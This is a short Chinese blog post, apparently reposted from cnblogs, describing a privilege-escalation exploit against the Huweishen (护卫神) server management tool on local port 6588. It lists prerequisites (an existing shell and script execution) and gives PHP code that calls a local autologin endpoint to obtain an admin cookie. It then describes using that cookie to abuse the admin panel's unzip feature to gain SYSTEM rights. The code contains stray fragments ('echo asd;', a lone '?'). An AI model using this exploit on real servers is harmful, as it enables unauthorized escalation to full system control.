护卫神6588端口提权

利用条件:
1.有shell
2.有可执行脚本

<?php
function httpGet() {
    $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?

拿到的cookie拿去后台登陆利用支持解压包以护卫神的system权限达到提权的目的

相关阅读:
活用 %取余用于变量循环
jquery滚动条固定在某一位置
jquary中各种相似操作介绍
jquary中滚动条滚动到底部
JSON到字符串之间的解析
ecshop删去版权等信息
分享代码和网页地图
ecshop版权的修改，头部，底部
ECSHOP中transport.js和jquery的冲突的简单解决办法
从Eclipse迁移到Android Studio碰到的问题记录

原文地址：https://www.cnblogs.com/zpchcbd/p/12160128.html